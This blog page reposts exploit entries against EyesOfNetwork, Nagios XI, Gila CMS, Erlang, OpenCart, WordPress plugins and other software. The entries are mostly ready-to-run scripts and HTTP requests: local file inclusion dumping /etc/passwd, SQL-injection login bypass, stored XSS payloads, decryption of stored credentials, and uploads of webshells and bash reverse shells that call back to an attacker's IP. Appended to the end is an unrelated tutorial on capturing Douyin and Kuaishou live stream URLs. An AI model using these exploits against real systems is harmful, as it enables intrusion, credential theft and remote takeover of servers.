Jump to content
  • Entries

    16114
  • Comments

    7952
  • Views

    863153542

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking

EyesOfNetwork 5.3 - LFI

# Exploit Title: EyesOfNetwork 5.3 - LFI
# Date: 10/01/2021
# Exploit Author: Audencia Business SCHOOL Red Team
# Vendor Homepage: https://www.eyesofnetwork.com/en
# Software Link: http://download.eyesofnetwork.com/EyesOfNetwork-5.3-x86_64-bin.iso
# Version: 5.3

The php not exclude other tools than proposed one. It's possible possible to include files when the parameter "tool_list=" is modified like that :

==================================================================
POST /module/tool_all/select_tool.php HTTP/1.1
Host: 192.168.0.26
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 209
Origin: https://192.168.0.26
Connection: close
Referer: https://192.168.0.26/module/tool_all/
Cookie: session_id=746751013; user_name=admin; user_id=1; user_limitation=0; group_id=1

(tool_list=FILE TO READ)
page=bylistbox&host_list=127.0.0.1&tool_list=/etc/passwd&snmp_com=aze&snmp_version=2c&min_port=1&max_port=1024&username=&password=&snmp_auth_protocol=MD5&snmp_priv_passphrase=&snmp_priv_protocol=&snmp_context=

==================================================================


Result a printed /etc/passwd document in the webpage : 

==================================================================

HTTP/1.1 200 OK 
Date: Sat, 09 Jan 2021 01:16:21 GMT 
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16 mod_perl/2.0.11 Perl/v5.16.3 
X-Powered-By: PHP/5.4.16 
Content-Length: 1529 
Connection: close 
Content-Type: text/html; charset=UTF-8 
 
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
nagios:x:999:991::/var/spool/nagios:/sbin/nologin
influxdb:x:998:998::/var/lib/influxdb:/bin/false
systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
apache:x:48:48:Apache:/usr/share/httpd:/sbin/nologin
mysql:x:27:27:MariaDB Server:/var/lib/mysql:/sbin/nologin
grafana:x:997:995:grafana user:/usr/share/grafana:/sbin/nologin
polkitd:x:996:994:User for polkitd:/:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
snmptt:x:995:992:SNMP Trap Translator:/var/spool/snmptt:/sbin/nologin
rpc:x:32:32:Rpcbind Daemon:/var/lib/rpcbind:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
chrony:x:994:990::/var/lib/chrony:/sbin/nologin
tss:x:59:59:Account used by the trousers package to sandbox the tcsd daemon:/dev/null:/sbin/nologin
cacti:x:1000:991::/home/cacti:/bin/bash
eon4apps:x:1001:991::/srv/eyesofnetwork/eon4apps:/bin/bash
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
admin:x:1002:1000:admin:/home/admin:/bin/bash

==================================================================
            
# Exploit Title: OpenCart 3.0.36 - ATO via Cross Site Request Forgery
# Date: 01-09-2021
# Exploit Author: Mahendra Purbia {Mah3Sec}
# Vendor Homepage: https://www.opencart.com
# Software Link: https://www.opencart.com/index.php?route=cms/download
# Version: OpenCart CMS - 3.0.3.6
# Tested on: Kali Linux

#Description:
OpenCart CMS 3.0.3.6 & below versions are vulnerable to Account takeover via CSRF, related to the endpoint /account/edit.

Steps to Reproduce:
1. create accounts a. victim & b. Attacker (attacker account is just for fetch the request and create a CSRf POC)
2. Now login with Attacker account and then go to account/edit and change the email and intercept this request in repeater, now create a CSRF POC of that request.
3. now in that poc change the email and email which is not registered {attacker another email}. Now save this request as a .html file.
4. now send this POC to the victim. and then the victim opens that file automatically all information is changed like name, email etc.
5. now attacker access account (with help of forgot password which came on attacker email) and fetch victim all information.
            
# Exploit Title: WordPress Plugin Custom Global Variables 1.0.5 - 'name' Stored Cross-Site Scripting (XSS) 
# Google Dork: NA
# Date: 09/01/2021
# Exploit Author: Swapnil Subhash Bodekar
# Vendor Homepage:
# Software Link: https://wordpress.org/plugins/custom-global-variables/#developers
# Version: 1.0.5
# Tested on Windows

How to reproduce vulnerability:

1. Install WordPress 5.6
2. Install and activate Custom Global variables plugin.
3. Navigate to Setting >> Custom Global Variables and enter the data into the user input field.
4. Capture the request into burp suite and append the JavaScript payload which is mentioned below 
"><script>(1)</script><"
5. You will observe that the payload successfully got stored into the database and when you are triggering the same functionality in that time JavaScript payload is executing successfully and we are getting a pop-up.
            
# Exploit Title: PortableKanban 4.3.6578.38136 - Encrypted Password Retrieval
# Date: 9 Jan 2021
# Exploit Author: rootabeta
# Vendor Homepage: The original page, https://dmitryivanov.net/, cannot be found at this time of writing. The vulnerable software can be downloaded from https://www.softpedia.com/get/Office-tools/Diary-Organizers-Calendar/Portable-Kanban.shtml
# Software Link: https://www.softpedia.com/get/Office-tools/Diary-Organizers-Calendar/Portable-Kanban.shtml
# Version: Tested on: 4.3.6578.38136. All versions that use the similar file format are likely vulnerable.
# Tested on: Windows 10 x64. Exploit likely works on all OSs that PBK runs on. 

# PortableKanBan stores credentials in an encrypted format
# Reverse engineering the executable allows an attacker to extract credentials from local storage
# Provide this program with the path to a valid PortableKanban.pk3 file and it will extract the decoded credentials

import json
import base64
from des import * #python3 -m pip install des
import sys

try:
	path = sys.argv[1]
except:
	exit("Supply path to PortableKanban.pk3 as argv1")

def decode(hash):
	hash = base64.b64decode(hash.encode('utf-8'))
	key = DesKey(b"7ly6UznJ")
	return key.decrypt(hash,initial=b"XuVUm5fR",padding=True).decode('utf-8')

with open(path) as f:
	try:
		data = json.load(f)
	except: #Start of file sometimes contains junk - this automatically seeks valid JSON
		broken = True
		i = 1
		while broken:
			f.seek(i,0)
			try:
				data = json.load(f)
				broken = False
			except:
				i+= 1
			

for user in data["Users"]:
	print("{}:{}".format(user["Name"],decode(user["EncryptedPassword"])))
            
HireHackking

Gila CMS 2.0.0 - Remote Code Execution (Unauthenticated)

# Exploit Title: Gila CMS 2.0.0 - Remote Code Execution (Unauthenticated) # Date: 1.12.2021 # Exploit Author: Enesdex # Vendor Homepage: https://gilacms.com/ # Software Link: https://github.com/GilaCMS/gila/releases/tag/2.0.0 # Version: x < 2.0.0 # Tested on: Windows 10 import requests import time target_url = "http://192.168.1.101:80/Gila/" cmd = "calc.exe" url = target_url+"?c=admin" cookies = {"GSESSIONID": "../../index.php"} headers = {"User-Agent": "<?php shell_exec('"+cmd+"'); include 'src\\core\\bootstrap.php'; ?>"} requests.get(url, headers=headers, cookies=cookies) time.sleep(5) requests.get(target_url+"/index.php")
HireHackking

SmartAgent 3.1.0 - Privilege Escalation

# Exploit Title: SmartAgent 3.1.0 - Privilege Escalation # Date: 01-11-2021 # Exploit Author: Orion Hridoy # Vendor Homepage: https://www.smartagent.io/ # Version: Build 3.1.0 # Tested on: Windows 10/Kali Linux A Low grade user like ViewOnly can create an account with SuperUser permission. Steps To Reproduce: 1. Create a user with ViewOnly 2. Visit https://demo.localhost.com/#/CampaignManager/users 3. Now you will be able to create an account with SuperUser. #Python Exploit [Replace With Your Authorization Code] import requests session = requests.Session() rawBody = "{\"username\":\"orion@hridoy.com \",\"password\":\"Orionhridoy69\",\"appName\":\"AppEngage\",\"role\":\"Admin\",\"android\":\"1\",\"ios\":\"0\",\"kai\":\"0\"}" headers = {"Authorization":"id=orion@gmail.com,engageToken=eyJhbGciOiJIUzUxMiJ9.eyJzdWIiOiJvcmlvbkBnbWFpbC5jb20iLCJyb2xlcyI6WyJWaWV3T25seSJdLCJhcHBOYW1lIjoiQXBwRW5nYWdlIiwicGxhdGZvcm0iOiJBTkRST0lEIiwiaXNzIjoiRU5BR0FHRSIsImlhdCI6MTYxMDM3NDEyMCwiZXhwIjoxNjExMjM4MTIwfQ.SbnZaRe3-2GOFOm7QDzvIBQCKBAK_GV-wKsMoH4GGChyjUFe2Ij4LiVl5rXsWRfTqNnJXj9fFxYTzkD2-kXlAQ","Accept":"application/json, text/plain, */*","User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0","Referer":"https://demo.localhost.com/","Connection":"close","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","DNT":"1","Content-Type":"application/json"} response = session.post("https://demo.localhost.com/api/createUser", data=rawBody, headers=headers) print("User Created With\nUser: orion@hridoy.com\nPass: Orionhridoy69")
HireHackking

Erlang Cookie - Remote Code Execution

# Exploit Title: Erlang Cookie - Remote Code Execution # Date: 2020-05-04 # Exploit Author: 1F98D # Original Author: Milton Valencia (wetw0rk) # Software Link: https://www.erlang.org/ # Version: N/A # Tested on: Debian 9.11 (x64) # References: # https://insinuator.net/2017/10/erlang-distribution-rce-and-a-cookie-bruteforcer/ # # Erlang allows distributed Erlang instances to connect and remotely execute commands. # Nodes are permitted to connect to eachother if they share an authentication cookie, # this cookie is commonly called ".erlang.cookie" # #!/usr/local/bin/python3 import socket from hashlib import md5 import struct import sys TARGET = "192.168.1.1" PORT = 25672 COOKIE = "XXXXXXXXXXXXXXXXXXXX" CMD = "whoami" s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((TARGET, PORT)) name_msg = b"\x00" name_msg += b"\x15" name_msg += b"n" name_msg += b"\x00\x07" name_msg += b"\x00\x03\x49\x9c" name_msg += b"AAAAAA@AAAAAAA" s.send(name_msg) s.recv(5) # Receive "ok" message challenge = s.recv(1024) # Receive "challenge" message challenge = struct.unpack(">I", challenge[9:13])[0] print("Extracted challenge: {}".format(challenge)) challenge_reply = b"\x00\x15" challenge_reply += b"r" challenge_reply += b"\x01\x02\x03\x04" challenge_reply += md5(bytes(COOKIE, "ascii") + bytes(str(challenge), "ascii")).digest() s.send(challenge_reply) challenge_res = s.recv(1024) if len(challenge_res) == 0: print("Authentication failed, exiting") sys.exit(1) print("Authentication successful") ctrl = b"\x83h\x04a\x06gw\x0eAAAAAA@AAAAAAA\x00\x00\x00\x03\x00\x00\x00\x00\x00w\x00w\x03rex" msg = b'\x83h\x02gw\x0eAAAAAA@AAAAAAA\x00\x00\x00\x03\x00\x00\x00\x00\x00h\x05w\x04callw\x02osw\x03cmdl\x00\x00\x00\x01k' msg += struct.pack(">H", len(CMD)) msg += bytes(CMD, 'ascii') msg += b'jw\x04user' payload = b'\x70' + ctrl + msg payload = struct.pack('!I', len(payload)) + payload print("Sending cmd: '{}'".format(CMD)) s.send(payload) print(s.recv(1024))
HireHackking

Online Hotel Reservation System 1.0 - Admin Authentication Bypass

# Exploit Title: Online Hotel Reservation System 1.0 - Admin Authentication Bypass # Exploit Author: Richard Jones # Date: 2021-01-13 # Vendor Homepage: https://www.sourcecodester.com/php/13492/online-hotel-reservation-system-phpmysqli.html # Software Link: https://www.sourcecodester.com/download-code?nid=13492&title=Online+Hotel+Reservation+System+in+PHP%2FMySQLi+with+Source+Code # Version: 1.0 # Tested On: Windows 10 Home 19041 (x64_86) + XAMPP 7.2.34 #Exploit URL: http://TARGET/marimar/admin/index.php Host: TARGET POST /marimar/admin/login.php HTTP/1.1 Content-Length: 57 Connection: close Cookie: PHPSESSID=82sevuai2qhh9h8b5jbucn0616 email=admin%27+or+1%3D1+--+-ac1d&pass=asdasdasd&btnlogin=
HireHackking

Nagios XI 5.7.X - Remote Code Execution RCE (Authenticated)

# Exploit Title: Nagios XI 5.7.X - Remote Code Execution RCE (Authenticated) # Date: 19/12/2020 # Exploit Author: Haboob Team (https://haboob.sa) # Vendor Homepage: https://www.nagios.com/products/nagios-xi/ # Version: Nagios XI 5.7.x # Tested on: (Ubuntu 18.04 / PHP 7.2.24) & Vendor's custom VM # CVE: CVE-2020-35578 #!/usr/bin/python3 # pip3 install bs4 lxml import requests import sys import warnings from bs4 import BeautifulSoup import base64 import urllib3 urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) if len(sys.argv) != 6: print("[~] Usage : python3 nagiosxi-rce.py http(s)://url username password reverse_ip reverse_port") print("[~] Example : python3 nagiosxi-rce.py https://192.168.224.139 nagiosadmin P@ssw0rd 192.168.224.138 443") exit() url = sys.argv[1] username = sys.argv[2] password = sys.argv[3] ip = sys.argv[4] port = sys.argv[5] request = requests.session() def login(): # Request nsp value (Nagios Session Protection, used to prevent CSRF attacks) nsp_str_req = request.get(url+"/nagiosxi/login.php", verify=False) content = nsp_str_req.text soup = BeautifulSoup(content, "lxml") nsp_str = soup.find_all('input')[0].get('value') print("[+] Extract login nsp token : %s" % nsp_str) # Login login_info = { "nsp": nsp_str, "pageopt": "login", "username": username, "password": password } login_request = request.post(url + "/nagiosxi/login.php", login_info, verify=False) login_text = login_request.text # Check Login Status if "Core Config Manager" in login_text: return True else: print("[-] Login ... 
Failed!") return False def execute_payload(): # Request nsp value (Nagios Session Protection, used to prevent CSRF attacks) print("[+] Request upload form ...") nsp_str_req = request.get(url+"/nagiosxi/admin/monitoringplugins.php", verify=False) content = nsp_str_req.text soup = BeautifulSoup(content, "lxml") nsp_str = soup.find_all('input')[1].get('value') print("[+] Extract upload nsp token : %s" % nsp_str) # Payload Base64 Encoding payload_decoded = "bash -i >& /dev/tcp/%s/%s 0>&1" % (ip, port) payload_bytes = payload_decoded.encode('ascii') base64_bytes = base64.b64encode(payload_bytes) payload_encoded = base64_bytes.decode('ascii') payload = ";echo " + payload_encoded + " | base64 -d | bash;#" print("[+] Base64 encoded payload : %s" % payload) # Payload Execution multipart_form_data = { 'upload': (None, '', None), 'nsp': (None, nsp_str, None), 'uploadedfile': (payload, 'whatever', 'text/plain'), 'convert_to_unix': (None, '1', None), } print("[+] Sending payload ...") print("[+] Check your nc ...") rce = request.post(url +"/nagiosxi/admin/monitoringplugins.php", files=multipart_form_data, verify=False) if login(): print("[+] Login ... Success!") execute_payload()
HireHackking
# Exploit Title: WordPress Plugin Easy Contact Form 1.1.7 - 'Name' Stored Cross-Site Scripting (XSS) # Date: 14/01/2021 # Exploit Author: Rahul Ramakant Singh # Vendor Homepage: https://ghozylab.com/plugins/ # Software Link: https://demo.ghozylab.com/plugins/easy-contact-form-plugin/ # Version: 1.1.7 # Tested on Windows Steps: 1. Install WordPress 5.6 2. Install and activate *Contact Form Plugin* plugin. 3. Go to * Contact Form Plugin *plugin section and click on the add new form button. 4. Fill all required details and click on the save button and capture the request in a proxy tool like burp suite. 6. Append the JavaScript payload in the "Email Header" field as mentioned below *"<sc><svg/onload=alert(454)>"* 5. You will observe that the payload successfully got stored and reflected into the response and the malicious JavaScript payload got executed successfully and we are getting a pop-up.
HireHackking
# Exploit Title: PHP-Fusion CMS 9.03.90 - Cross-Site Request Forgery (Delete admin shoutbox message) # Date: 2020-12-21 # Exploit Author: Mohamed Oosman B S # Vendor Homepage: https://www.php-fusion.co.uk/ # Software Link: https://www.php-fusion.co.uk/phpfusion_9_downloads.php # Version: 9.03.90 and below # Tested on: Windows 10 # CVE : CVE-2020-35687 1. Description: PHP-Fusion version 9.03.90 is vulnerable to CSRF attack which leads to deletion of shoutbox messages by the attacker on behalf of the logged in victim. 2. Proof of Concept As the requests for deleting the admin shoutbox are sent using the GET method, the CSRF attack to delete an attacker-controlled shoutbox message can be performed by having the admin visit https://TARGET.com/infusions/shoutbox_panel/shoutbox_archive.php?s_action=delete&shout_id=1 directly, after getting to know the shout_id of the message, as it is sequential. <html> <body> <script>history.pushState('', '', '/')</script> <form action="https://TARGET/infusions/shoutbox_panel/shoutbox_archive.php"> <input type="hidden" name="s&#95;action" value="delete" /> <input type="hidden" name="shout&#95;id" value="3" /> <input type="submit" value="Submit request" /> </form> </body> </html>
HireHackking
# Exploit Title: Online Hotel Reservation System 1.0 - Stored Cross-site Scripting # Exploit Author: Mesut Cetin # Date: 2021-01-14 # Vendor Homepage: https://www.sourcecodester.com/php/13492/online-hotel-reservation-system-phpmysqli.html # Software Link: https://www.sourcecodester.com/download-code?nid=13492&title=Online+Hotel+Reservation+System+in+PHP%2FMySQLi+with+Source+Code # Version: 1.0 # Tested on: Kali Linux 2020.4, PHP 7.4.13, mysqlnd 7.4.13, Apache/2.4.46 (Unix), OpenSSL/1.1.1h, mod_perl/2.0.11 Perl/v5.32.0 ######## Description ######## The room 'description' parameter is vulnerable to stored Cross-site Scripting. ######## Proof of Concept ######### Login with administrator credentials at http://localhost/admin with admin:admin and click on "Rooms" tab. Edit "description" parameter: 1<script>alert('document.cookie')</script> Any user at http://localhost/marimar/index.php will get the XSS pop-up warning with their cookie values.
HireHackking

EyesOfNetwork 5.3 - File Upload Remote Code Execution

# Exploit Title: EyesOfNetwork 5.3 - File Upload Remote Code Execution # Date: 10/01/2021 # Exploit Author: Ariane.Blow # Vendor Homepage: https://www.eyesofnetwork.com/en # Software Link: http://download.eyesofnetwork.com/EyesOfNetwork-5.3-x86_64-bin.iso # Version: 5.3-10 (12/9/2020-lastest) #!/bin/bash # (/!\) You may have change this string : "user_id=1; user_limitation=0; group_id=1" if you are not the admin user in the admin group, you find this in the cookies params /!\ ############################################### # (Authentified) # # Abritraty file upload # # It whase a Challenge to do that in BASH # # But the exploit's working fine ! # # ........... # # Exploit is working with the actual version # # Scripted on 01/10/2021 # # By Ariane.Blow # # https://ariane.agency/ # ############################################### banner() { clear echo " ,*-." echo ' | |' echo ' ,. | |' echo ' | |_| | ,.' echo ' `---. |_| |' echo ' | .--`' echo " | |" echo " | |" echo ""Ω echo " ! DO NOT USE IF YOU DONT HAVE PERSMISSION !" echo "" echo " EyesOfNetwork 5.3-10" echo "" echo " RedTeam Tool" echo "" echo " Input verification desertion" echo "" echo " RCE via Arbitrary FileUpload" echo "" echo "" } VAR() { #var #Beacause I don't whant to see all the *.sh in my OPT directory ... BashMan Tips xD ! mkdir /tmp/EON53 cd /tmp/EON53 #you can not upload more than 1 file with a same URL and same filename, i just add a random char at the end of URL and in the filename export random=$(cat /dev/urandom | tr -dc 'bcdfghjklmnpqrstvwxz' | head -c 9) export filename=shell$random.xml.php echo "EyesOfNetwork IP :" read eonIP echo "HackerIP (used to start the listener) :" read hackerIP echo "Hacker PORT (used to start the listener):" read PORT echo "Username (default = admin) :" read username echo "password :" read password } #Getting the session_id GetSessionID() { echo "getting sessionID ... 
" echo "curl -i -s -k -X $'POST' -H $'Host: $eonIP' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Referer: https://$eonIP/login.php' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 20' -H $'Origin: https://$eonIP' -H $'Connection: close' -H $'Upgrade-Insecure-Requests: 1' --data-binary $'login=$username&mdp=$password' $'https://$eonIP/login.php' | grep session | cut -d ';' -f 1 | cut -d '=' -f 2" >> GetSession.sh chmod +x GetSession.sh sessionID=$(./GetSession.sh) echo "sessionID acquired : $sessionID" sleep 3 echo } #start listener start_listen() { printf "\e[31;1m When the Reverse-Shell is etablished, you can PrivEsc with :\e[0m \n" echo "echo 'os.execute(\"/bin/sh\")' > /tmp/nmap.script" echo "sudo nmap --script=/tmp/nmap.script" printf "\e[31;1m ... I Know ... \e[0m \n" echo "gnome-terminal -e 'nc -lnvp $PORT'" >> listen.sh chmod +x listen.sh ./listen.sh } #POST payload Payload() { echo "Sending PostRequest ..." 
echo "curl -i -s -k -X $'POST' \ -H $'Host: $eonIP' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0' -H $'Accept: text/html, */*; q=0.01' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'X-Requested-With: XMLHttpRequest' -H $'Content-Type: multipart/form-data; boundary=---------------------------123135855827554554412483984802' -H $'Content-Length: 1565' -H $'Origin: https://$eonIP' -H $'Connection: close' -H $'Referer: https://$eonIP/module/admin_itsm/modification_itsm.php' -H $'Cookie: session_id=$sessionID; user_name=$username; user_id=1; user_limitation=0; group_id=1' \ -b $'session_id=$sessionID; user_name=$username; user_id=1; user_limitation=0; group_id=1' \ --data-binary $'-----------------------------123135855827554554412483984802\x0d\x0aContent-Disposition: form-data; name=\"itsm_url_id\"\x0d\x0a\x0d\x0a\x0d\x0a-----------------------------123135855827554554412483984802\x0d\x0aContent-Disposition: form-data; name=\"itsm_url\"\x0d\x0a\x0d\x0ahttp://HackMe.ImFamous$random\x0d\x0a-----------------------------123135855827554554412483984802\x0d\x0aContent-Disposition: form-data; name=\"fileName\"; filename=\"$filename\"\x0d\x0aContent-Type: text/xml\x0d\x0a\x0a<?php\x0d\x0aexec(\"/bin/bash -c \'bash -i > /dev/tcp/$hackerIP/$PORT 0>&1\'\");\x0a\x0a\x0d\x0a-----------------------------123135855827554554412483984802\x0d\x0aContent-Disposition: form-data; name=\"input_file_name\"\x0d\x0a\x0d\x0ashell.xml\x0d\x0a-----------------------------123135855827554554412483984802\x0d\x0aContent-Disposition: form-data; name=\"itsm_type_request\"\x0d\x0a\x0d\x0aget\x0d\x0a-----------------------------123135855827554554412483984802\x0d\x0aContent-Disposition: form-data; name=\"itsm_header[]\"\x0d\x0a\x0d\x0aaz\x0d\x0a-----------------------------123135855827554554412483984802\x0d\x0aContent-Disposition: form-data; 
name=\"itsm_var[0][var_name]\"\x0d\x0a\x0d\x0aaz\x0d\x0a-----------------------------123135855827554554412483984802\x0d\x0aContent-Disposition: form-data; name=\"itsm_var[0][champ_ged_id]\"\x0d\x0a\x0d\x0a\x0d\x0a-----------------------------123135855827554554412483984802\x0d\x0aContent-Disposition: form-data; name=\"itsm_parent\"\x0d\x0a\x0d\x0a\x0d\x0a-----------------------------123135855827554554412483984802\x0d\x0aContent-Disposition: form-data; name=\"itsm_return_champ\"\x0d\x0a\x0d\x0a\x0d\x0a-----------------------------123135855827554554412483984802\x0d\x0aContent-Disposition: form-data; name=\"action\"\x0d\x0a\x0d\x0aadd_external_itsm\x0d\x0a-----------------------------123135855827554554412483984802--\x0d\x0a' \ $'https://$eonIP/module/admin_itsm/ajax.php' | grep success" >> req.sh chmod +x req.sh ./req.sh } #Get request on PHP exploit Req_payload() { echo "Get request on the PHP payload ..." echo "curl -i -s -k -X $'GET' \ -H $'Host: $eonIP' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Connection: close' -H $'Cookie: session_id=$sessionID; user_name=$username; user_id=1; user_limitation=0; group_id=1' -H $'Upgrade-Insecure-Requests: 1' -H $'Cache-Control: max-age=0' \ -b $'session_id=$sessionID; user_name=$username; user_id=1; user_limitation=0; group_id=1' \ $'https://$eonIP/module/admin_itsm/uploaded_file/$filename'" >> reqGET.sh chmod +x reqGET.sh ./reqGET.sh } #Clearing Clear_cache() { echo "clearing cache" rm listen.sh rm req.sh rm reqGET.sh rm GetSession.sh cd .. rmdir EON53 } #MAIN banner VAR GetSessionID start_listen Payload Req_payload Clear_cache
HireHackking

E-Learning System 1.0 - Authentication Bypass

# Exploit Title: E-Learning System 1.0 - Authentication Bypass & RCE # Exploit Author: Himanshu Shukla & Saurav Shukla # Date: 2021-01-15 # Vendor Homepage: https://www.sourcecodester.com/php/12808/e-learning-system-using-phpmysqli.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/caiwl.zip # Version: 1.0 # Tested On: Kali Linux + XAMPP 7.4.4 # Description: E-Learning System 1.0 - Authentication Bypass Via SQL Injection + Remote Code Execution #Step 1: run the exploit in python with this command: python3 exploit.py #Step 2: Input the URL of the vulnerable application: Example: http://10.10.10.23/caiwl/ #Step 3: Input your LHOST where you want the reverse shell: Example: 10.9.192.23 #Step 4: Input your LPORT that is the port where the reverse shell will spawn: Example: 4444 #Step 5: Start a Netcat Listener on the port specified in Step 4 using this command: nc -lnvp 4444 #Step 6: Hit enter on the if your Netcat Listener is ready, and you will get a reverse shell as soon as you hit enter. import requests print('########################################################') print('## E-LEARNING SYSTEM 1.0 ##') print('## AUTHENTICATION BYPASS & REMOTE CODE EXECUTION ##') print('########################################################') print('Author - Himanshu Shukla & Saurav Shukla') GREEN = '\033[32m' # Green Text RED = '\033[31m' # Red Text RESET = '\033[m' # reset to the defaults #Create a new session s = requests.Session() #Set Cookie cookies = {'PHPSESSID': 'd794ba06fcba883d6e9aaf6e528b0733'} LINK=input("Enter URL of The Vulnarable Application : ") #Authentication Bypass print("[*]Attempting Authentication Bypass...") values = {"user_email":"'or 1 or'", "user_pass":"lol","btnLogin":""} r=s.post(LINK+'admin/login.php', data=values, cookies=cookies) r=s.post(LINK+'admin/login.php', data=values, cookies=cookies) #Check if Authentication was bypassed or not. logged_in = True if("You login as Administrator." 
in r.text) else False l=logged_in if l: print(GREEN+"[+]Authentication Bypass Successful!", RESET) else: print(RED+"[-]Failed To Authenticate!", RESET) #Creating a PHP Web Shell phpshell = { 'file': ( 'shell.php', '<?php echo shell_exec($_REQUEST["cmd"]); ?>', 'application/x-php', {'Content-Disposition': 'form-data'} ) } # Defining value for form data data = {'LessonChapter':'test', 'LessonTitle':'test','Category':'Docs','save':''} #Uploading Reverse Shell print("[*]Uploading PHP Shell For RCE...") upload = s.post(LINK+'/admin/modules/lesson/controller.php?action=add', cookies=cookies, files=phpshell, data=data, verify=False) shell_upload = True if("window.location='index.php'" in upload.text) else False u=shell_upload if u: print(GREEN+"[+]PHP Shell has been uploaded successfully!", RESET) else: print(RED+"[-]Failed To Upload The PHP Shell!", RESET) print("[*]Please Input Reverse Shell Details") LHOST=input("[*]LHOST : ") LPORT=input("[*]LPORT : ") print('[*]Start Your Netcat Listener With This Command : nc -lvnp '+LPORT) input('[*]Hit Enter if your netcat shell is ready. ') print('[+]Deploying The Web Shell...') #Executing The Webshell e=s.get('http://192.168.1.5/caiwl/admin/modules/lesson/files/shell.php?cmd=nc 192.168.1.2 9999 -e /bin/bash', cookies=cookies) exit()
HireHackking

Title: Crawl Douyin Kuaishou Camera Live Streaming

In recent years, live broadcasts on various platforms have become increasingly popular. In life and production, we need some live broadcast scenarios. For example, the live streaming of Douyin and Kuaishou platforms are captured and played directly in real time in the network player. Can it be done? Let’s study with my cousin!http://xiaoyaozi666.oss-cn-beijing.aliyuncs.com/3_20221028182552.gif
Three common live broadcast protocols
The RTMP protocol is designed for streaming media and is used more frequently in streaming. At the same time, most CDN manufacturers support the RTMP protocol.
HTTP-FLV uses HTTP long connections similar to RTMP streaming and needs to be distributed by a specific streaming server, taking into account the advantages of both. and a streaming protocol that can reuse existing HTTP distribution resources. Its real-time performance is equal to RTMP, which saves some protocol interaction time compared to RTMP, has shorter first-screen time and more expandable functions.
As a live broadcast protocol proposed by Apple, HLS occupies an unshakable position on the iOS side, and the Android side also provides corresponding support.http://xiaoyaozi666.oss-cn-beijing.aliyuncs.com/image_20221028182848.png?x-oss-process=style/gzh
Get Douyin Kuaishou Live Streaming
What if you get the live broadcast address of Douyin? We just need to use the traffic analysis tool to grab the URL containing the above protocol.
First we find the current live broadcast to crawl. And share it as follows:
http://xiaoyaozi666.oss-cn-beijing.aliyuncs.com/image_20221028183449.png?x-oss-process=style/gzh
Open the shared address in the browser, bing
http://xiaoyaozi666.oss-cn-beijing.aliyuncs.com/image_20221028183759.png?x-oss-process=style/gzh
Then use the traffic analysis tool to grab the current data packet.
Then, we search for the file format flv or m3u8 in the live broadcast protocol.
http://xiaoyaozi666.oss-cn-beijing.aliyuncs.com/image_20221028184833.png?x-oss-process=style/gzh
http://xiaoyaozi666.oss-cn-beijing.aliyuncs.com/image_20221028184858.png?x-oss-process=style/gzh
Right-click to copy the address. Then put it in the streaming media playback tool to test it.
http://xiaoyaozi666.oss-cn-beijing.aliyuncs.com/image_20221028185013.png?x-oss-process=style/gzhThe effects are as followshttp://xiaoyaozi666.oss-cn-beijing.aliyuncs.com/image_20221028185059.png?x-oss-process=style/gzh
In the same way, we can capture the live stream of Kuaishou B station.
http://xiaoyaozi666.oss-cn-beijing.aliyuncs.com/image_20221028185406.png?x-oss-process=style/gzh
Crawl data http://xiaoyaozi666.oss-cn-beijing.aliyuncs.com/image_20221028185441.png?x-oss-process=style/gzh
http://xiaoyaozi666.oss-cn-beijing.aliyuncs.com/image_20221028185617.png?x-oss-process=style/gzh
Playing the stream in HTML
Now we run into a new problem. We have the live stream, but it only plays in a dedicated streaming player. Can a live stream be played in an HTML page?
In HTML5 the video tag plays video, but natively it only handles common container formats such as mp4 and webm; flv and m3u8 streams are not supported. How do we solve this?
Meet flv.js
flv.js is a JavaScript library that plays FLV video through the HTML5 video element. It works by remuxing the FLV stream into ISO BMFF (fragmented MP4) segments and feeding those segments to the browser through Media Source Extensions.
